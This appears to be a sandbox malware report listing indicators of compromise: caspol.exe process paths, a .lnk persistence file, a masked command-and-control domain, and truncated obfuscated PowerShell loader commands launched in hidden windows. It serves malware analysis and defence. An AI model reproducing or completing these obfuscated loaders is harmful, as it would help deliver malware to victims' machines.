Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %HOMEPATH%\documents\autopolo2.lnk
- 'sm####harath.com':443
- 'sm####harath.com':443
- DNS ASK sm####harath.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Dogtrick = """PFCuCnNcStDiToFnV cFGlKeUxPiBbAiBlUiStMiseAsP0U0S C{NpMaSrRaTmM(D[USAtArSiFnIgB]N`$DTSrLiTgBoHnRoSmTeHtCrKyS)P;BFFoHrC(N`$KTPotlweDrHaOtBiDoInKiAsWmI=C1C;V S`$STAoRlHeLrSaOtSiPo...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c echo REG_SZ
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Dogtrick = """PFCuCnNcStDiToFnV cFGlKeUxPiBbAiBlUiStMiseAsP0U0S C{NpMaSrRaTmM(D[USAtArSiFnIgB]N`$DTSrLiTgBoHnRoSmTeHtCrKyS)P;BFFoHrC(N`$KTPotlweDrHaOtBiDoInKiAsWmI=C1C;V S`$STAoRlHeLrSaOtSiPo...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Flexibilities00 {param([String]$Trigonometry);For($Tolerationism=1; $Tolerationism -lt $Trigonometry.Length-1; $Tolerationism+=(1+1)){$Alintatao = $Alintatao + $Trigonometry.Substring...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'